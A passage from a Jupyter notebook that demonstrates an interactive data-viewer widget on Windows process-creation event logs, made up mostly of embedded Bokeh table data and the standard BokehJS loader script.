05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1026\"},\"selection_policy\":{\"id\":\"1027\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1057\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1048\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1047\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1012\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1045\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1046\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1045\"},\"title\":\"NewProcessId\",\"width\":5},\"id\":\"1011\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1038\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1037\"},\"title\":\"SubjectUserSid\",\"width\":8},\"id\":\"1007\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1054\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1053\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1015\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1033\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1034\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1036\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1038\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1048\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1055\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1061\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1062\"},\"field\":\"TimeCreatedUtc\",\"formatter\":{\"id\":\"1061\"},\"title\":\"TimeCreatedUtc\",\"width\":23},\"id\":\"1019\",\"type\":\"TableColumn\"}],\"root_ids\":[\"1024\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n var render_items = [{\"docid\":\"10ccfc77-fc95-462a-a396-e33a049da5d1\",\"notebook_comms_target\":\"1063\",\"root_ids\":[\"1024\"],\"roots\":{\"1024\":\"5705a6d0-1bca-4c2f-ad12-bc65f08f3497\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n var attempts = 0;\n var timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1024" } }, "output_type": "display_data" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "a67b7cf6035d467184274b9aa4ccfea2", "version_major": 2, "version_minor": 0 }, "text/plain": [ "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "DataViewer(data)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Specify an initial set of columns" ] }, { "cell_type": "code", "execution_count": 3, "metadata": {}, "outputs": [ { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n var JS_MIME_TYPE = 'application/javascript';\n var HTML_MIME_TYPE = 'text/html';\n var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n var CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n var script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n var cell = handle.cell;\n\n var id = cell.output_area._bokeh_element_id;\n var server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd, {\n iopub: {\n output: function(msg) {\n var id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n var output_area = handle.output_area;\n var output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n var bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n var script_attrs = bk_div.children[0].attributes;\n for (var i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n var toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n var events = require('base/js/events');\n var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(null);\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n 